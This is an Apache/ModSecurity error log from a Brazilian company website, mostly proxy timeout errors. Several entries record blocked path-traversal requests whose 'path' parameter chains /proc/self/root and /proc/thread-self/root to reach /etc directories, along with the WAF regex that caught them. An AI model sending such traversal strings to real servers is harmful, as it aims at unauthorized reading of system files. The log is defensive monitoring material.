[Thu Mar 19 16:27:39.032954 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:58160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxOK_u8EFLIOrSqIpvO2QAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:27:59.665546 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:28:22.830145 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:57578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxOVvqxLDW4GITHUkSOugAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:28:24.420201 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59738] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:28:34.784855 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:33250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxOYv-YZRR_7pZ7nDKycgAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:28:53.753853 2026] [proxy_fcgi:error] [pid 8307:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:29:10.261668 2026] [:error] [pid 21563:tid 140411540502272] [client 74.7.241.31:47738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxOhkpm7ZmxKZTM4bZqzwAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:29:15.718978 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:49724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxOi_-YZRR_7pZ7nDKypQAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:29:16.045885 2026] [proxy_fcgi:error] [pid 7545:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:29:43.021876 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:30:09.969875 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:30:34.650001 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60854] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:30:58.389835 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:32804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:31:30.393809 2026] [proxy_fcgi:error] [pid 21219:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:32888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:32:04.625871 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32962] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:32:26.146037 2026] [proxy_fcgi:error] [pid 19655:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:32:47.194015 2026] [proxy_fcgi:error] [pid 21563:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:33:09.050025 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33580] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:33:30.071792 2026] [proxy_fcgi:error] [pid 7235:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:33:51.177441 2026] [proxy_fcgi:error] [pid 20435:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:34:16.154837 2026] [proxy_fcgi:error] [pid 7545:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34094] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:34:36.889976 2026] [:error] [pid 5816:tid 140411599251200] [client 74.7.243.128:56930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxPy5fmNfuxceSuAEK79QAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:34:54.433820 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34218] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:35:34.557824 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:35:58.926018 2026] [proxy_fcgi:error] [pid 5816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:36:28.017847 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:37:04.117886 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34794] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:37:33.419144 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:37:42.556318 2026] [:error] [pid 7545:tid 140411658000128] [client 74.7.243.128:44932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxQhn8B84UptSoTJtY1-wAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:38:09.161859 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35076] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:38:55.157865 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35200] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:39:16.271683 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35632] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:39:37.819289 2026] [proxy_fcgi:error] [pid 5816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35812] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:39:54.484671 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.244.43:44376] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxRCr-FhjpZGs9ba8qRZQAAAw0"]
[Thu Mar 19 16:39:59.119500 2026] [proxy_fcgi:error] [pid 7545:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:40:31.669878 2026] [proxy_fcgi:error] [pid 21563:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:41:26.690188 2026] [proxy_fcgi:error] [pid 5816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36212] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:42:15.209297 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:42:36.286001 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:43:07.069869 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36962] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:43:35.017342 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37072] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:44:04.097915 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37194] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:44:29.849594 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:44:48.866474 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:45076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxSMMdf6f5d65gmYZSgrwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:44:59.233805 2026] [proxy_fcgi:error] [pid 7545:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:45:24.977841 2026] [proxy_fcgi:error] [pid 8307:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:45:46.129803 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37866] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:46:07.121192 2026] [proxy_fcgi:error] [pid 21563:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:46:28.170079 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:46:50.131228 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38476] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:47:11.061862 2026] [proxy_fcgi:error] [pid 5816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:47:21.122021 2026] [:error] [pid 5816:tid 140411699963648] [client 74.7.228.61:54230] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxSyZfmNfuxceSuAEK8kwAAAcU"]
[Thu Mar 19 16:47:37.133818 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:48:03.064302 2026] [:error] [pid 20435:tid 140411599251200] [client 74.7.243.128:51328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxS85JaM1-0uhhUQJM_wwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:48:07.185809 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38960] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:48:40.449808 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:49:02.133891 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:49:23.501848 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:49:47.049982 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:50:08.753488 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:50:30.709843 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:51:07.229819 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40752] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:51:11.024741 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.244.43:45782] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxTrxCii7xarUs8iHYRUQAAAhY"]
[Thu Mar 19 16:51:59.601824 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:52:16.039594 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.243.128:47854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxT8PqxLDW4GITHUkSPHQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:52:23.222963 2026] [proxy_fcgi:error] [pid 21563:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:52:44.615110 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:53:07.241818 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:53:28.777825 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:53:50.294299 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:54:23.617831 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:54:58.877825 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:55:26.795080 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:46528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxUrvu8EFLIOrSqIpvP2wAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:55:32.750632 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:55:59.134026 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43562] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:56:20.122973 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:56:41.125655 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43962] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:57:02.033822 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:57:24.081977 2026] [proxy_fcgi:error] [pid 21563:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44278] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:57:45.621823 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44404] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:58:07.349884 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44570] AH01075: Error dispatching request to : (polling)
